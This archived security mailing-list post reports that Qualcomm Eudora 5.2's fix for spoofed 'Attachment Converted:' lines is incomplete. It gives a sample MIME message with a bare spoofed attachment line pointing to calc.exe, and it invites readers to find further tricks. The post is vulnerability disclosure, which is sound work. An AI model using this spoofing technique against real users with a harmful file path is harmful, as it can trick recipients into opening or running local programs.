Eudora 5.2 attachment spoof

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Qualcomm Eudora 5.2 has been released recently. Quoting from
http://www.eudora.com/download/eudora/windows/5.2/RelNotes.txt :

> Added checks to prevent spoofed Attachment Converted: exploits.
> ...
> We now guard against exploits that rely on local file refs (using either
> fixed paths or relative paths). On by default and controlled by
> <x-Eudora-option:RemoveSuspiciousLocalFileRefs>.

Those fixes are not very robust. Attachments can still be spoofed, e.g.
with message:

  MIME-Version: 1.0
  From: me
  To: you
  Content-Type: multipart/mixed; boundary="xyz"
  
  It does not seem to matter much what MIME boundary we use,
  a "bare" spoofed attachment line is NOT prefixed with #?
  Attachment Converted: "c:\winnt\system32\calc.exe"
  Never mind that the text comes out all funny...

Any other tricks we can play?

Cheers,

Paul Szabo - psz@maths.usyd.edu.au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux